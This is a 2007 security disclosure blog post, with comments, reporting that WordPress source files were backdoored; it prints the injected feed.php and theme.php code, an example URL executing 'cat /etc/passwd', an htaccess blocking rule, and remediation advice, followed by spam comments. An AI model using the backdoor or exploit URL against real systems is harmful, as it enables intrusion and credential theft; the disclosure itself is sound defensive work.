Saturday, March 3, 2007

WordPress source code compromised to enable remote code execution

While assessing the security of WordPress, a popular blog creation software, I have discovered that it's source code has recently been compromised by a third party in order to enable remote command execution on the machines running affected versions. The compromised files are wp-includes/feed.php and wp-includes/theme.php.
The following code has been added:

in wp-includes/feed.php

function comment_text_phpfilter($filterdata) {
if ($_GET["ix"]) { comment_text_phpfilter($_GET["ix"]); }

in wp-includes/theme.php

function get_theme_mcommand($mcds) {
if ($_GET["iz"]) { get_theme_mcommand($_GET["iz"]); }

this would enable remote command execution on machines running compromised versions, for example

http://wordpressurl/wp-includes/theme.php?iz=cat /etc/passwd

I have discovered this vulnerability on Friday, March 2nd 2007 and contacted WordPress about it straight away. They reacted promptly by disabling downloads until further investigation. Later they determined that ony one of two servers has been compromised and that the two files mentioned above are the only ones changed.

It seems that the above files were changed on Feb 25th, 2007, so if you downloaded WordPress between Feb 25th, 2007 and Mar 2nd 2007 it is possible that you are running a compromised version, so be sure to check for the above code.

About Wordpress
"WordPress is a state-of-the-art semantic personal publishing platform with a focus on aesthetics, web standards, and usability. What a mouthful. WordPress is both free and priceless at the same time."

Thanks to Ryan Boren of WordPress for quick response and his feedback regarding this issue.


Mr Apache said...

Code to Forbid requests with querystrings ix or iz

RewriteCond %{QUERY_STRING} (ix|iz)
RewriteRule .* - [F]

Ultimate htaccess article

Doug Karr said...


Could this be utilized to obtain any information from the source site? Example: logins, passwords, MySQL configuration, OpenID configuration, etc?

I'm curious if simply downloading and installing the corrected software is a total solution or whether or not anyone is advising WP users to reconfigure their logins/passwords, etc.


Ivan Fratric said...

Dear Doug,

the exploitation of this, by itself, leads to command execution on the effected machine under the privileges of web server user, typically 'nobody'. This means that the cracker could read any files readable to this user. This typically includes web application configuration files (which typically contain mySQL username and password the web application uses to connect to the database), as well as files such as /etc/passwd, which contains a list of usernames for the server, which could be used in brute-force type attacks. Cracker could also modify any files writeable by this user and also upload files in folders writeable to this user.

However, you should also consider the following - obtaining the admin privileges on the machine once you have established the remote access, even as an unprivileged user, is usually by far easier than obtaining the remote access itself.

So to conclude, if you were running the compromised version (and it's quite easy to check if you kept the downloaded archive somewhere) it would be best if you changed all relevant passwords and logins where appropriate.

Ivan Fratric said...

Plus, the cracker might manage to put some kind of backdoor on the server using this, so the absolutely safest thing to do would be to make the clean install of everything.

ceras said...

That bug dont work, i have wordpress from january, this files feed.php ...

and execution command dont work, i have white page :)

That fucking bullshits not bug

Ivan Fratric said...


You wouldn't be affected if you downloaded WordPress in January, only if you downloaded it between Feb 25th and Mar 2nd and only if you downloaded it from the compromised server.

If you want confirmation, take a look at

Shelly said...

I had a question. I just installed WP 2.1 (NOT 2.1.1) a few weeks ago for a client who needed 16 different installations (didn't want to use MU).

I've been told by the wp-pro list that I *should* be okay with 2.1, because the exploit wasn't in that version (and if it were, I had downloaded my copy January 28 - so I'm in the clear anyway). However, someone said that the reason 2.1.1 was released was to fix another security flaw, and I should have upgraded anyway.

I guess I'd like to know this: should I download the new 2.1.2 and upgrade all 16 of those blogs already? I don't know what security flaw is in 2.1 - nothing was mentioned - but I'd appreciate any advice on this.

Ivan Fratric said...


you really should be asking this in a WordPress support forum.
Having said that, I'm not aware of any vulnerabilities fixed from 2.1 to 2.1.1 (which doesn't mean there weren't any), but there are known vulnerabilities in 2.1.1 which are possibly present in previous versions as well. You can find out the details at
These are all script injection vulnerabilities. They aren't exactly what I would call critical, but should be taken care of nevertheless.

Shelly said...

Thanks Ivan,

Actually, I *did* ask at the support forums - I guess I'm impatient ;) I did get advice on basically what you said: that it wouldn't hurt to upgrade to 2.1.2, but it's not absolutely necessary.

I've already emailed the client with this information, and I'm letting them decide what they want me to do. I couldn't find the exact information you gave me (about the injection), but I did tell them there wouldn't have been an upgrade if it weren't something important.

Thanks for your advice - I appreciate it :)

Anonymous said...

For the time being this bug is not working on any of the Wordpress i tried. But this post is good, thanks for sharing..

Best Regards,
Eliena Andrews

Piyush said...

Hi Ivan,
I have posted about your discovery on my blog. Here is the link.
Thanks for sharing this.

John Diesel said...
This comment has been removed by the author.
John Diesel said...

This is really a very informational blog post. Your opinion about is really very useful as user point of view. Please keep sharing some more information.

Toronto security cameras | Toronto Control4

aliya seen said...

Only best programmers can dodatabase assignment because i am getting trouble whenevr i try to do myself.

Aeldra Robinson said...

if you were running the compromised version (and it's quite easy to check if you kept the downloaded archive somewhere) it would be best if you changed all relevant passwords and logins where appropriate. This is really a very informational blog post. Your opinion about is really very useful as user point of view. Please keep sharing some more information.

mobile code security


Appreciative for such brilliant blog yours...!
Wordpress Development Company in India

Omkarsoft Bangalore said...

Nice blog.
We are the best Wordpress Development Company

Orion Technosoft said...

great article, its helps us alot.
Wordpress Development in Pune
Digital Marketing Services

Arnold Peter said...

Nice Article. I can able to gain some knowledge on web development. Thanks for sharing this post.

If you want to check more details on WordPress Website development Click here Wordpress Web Development Company

Dharampal Singh said...

Great article. keep trying to share your thought and content with us by your blog.Wordpress Web Development Services

Designpluz said...

Web Design Sydney: It is a great sharing...I am very much pleased with the contents you have mentioned. I wanted to thank you for this great article.Logo Design Sydney

Unknown said...

Greate Job.!Find the Wordpress Website Development Services in Pune.
Wordpress Developer in Pune
Wordpress Website Development Services in Pune

Pandya Mansi Rashmikant said...

This is a very helpful. Great Tips !! Keep publishing your content and published new content for good readers.Wordpress Web Development Services

Meentosys Pvt Ltd said...

nice blog post .. Meentosys is an Website Development Company In Delhi which delivers high quality, cost-effective, reliable, efficient and result oriented Website Development solutions to its clients from all over the India. We are professional Website Development Company at delivering projects to our clients on time with high client satisfaction.

Acme Webtechnology said...

WordPress source code compromised to enable remote code execution is really impressive and informative psst. Great job!

Magento development company

Ali said...

This is amazing blog i never ever had seen earlier.. I like the way you share...Wordpress Development Company USA

Sonali Taral said...

Thanks for sharing article about wordpress development company.
Wordpress Development Company in Pune

Ancy merina said...

It was really nice to read article written on this blog. I would also like to add few techniques with best of my knowledge which can help reader more and more.
Web development company in bangalore| web design company bangalore

Vibha said...

Searching for Wordpress Development Company
visit us at webgensis for custom web development services and Hire Wordpress Expert
who code your dreams live.

Zinavo said...

Really an interesting and amazing post. Thanks for sharing this wonderful informative article here. I appreciate your hard work.Website Development Bangalore | Web Designing Company Bangalore

Bangalore Web Guru said...

Thank you for your post. This is excellent information. It is amazing and wonderful to visit your site. Website Design Company Bangalore | Web Development Company Bangalore

webgensis mkt said...

if you are thinking about to make your online presence more powerful and design your ecommerce store with magento then Hire Magento Developer from us in affordable price. We are a certified Magento Development Company having years of experience in developing online stores with magento.

john ryans said...

Thank you for taking time & sharing the insights. Really a great post about Wordpress Development. to know more, visit here